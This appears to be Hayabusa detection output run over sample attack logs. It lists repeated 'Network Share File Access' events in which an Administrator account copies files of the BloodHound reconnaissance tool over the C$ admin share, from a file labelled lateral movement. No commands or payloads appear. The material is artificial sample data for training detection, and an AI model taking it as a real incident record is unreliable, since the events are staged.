2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
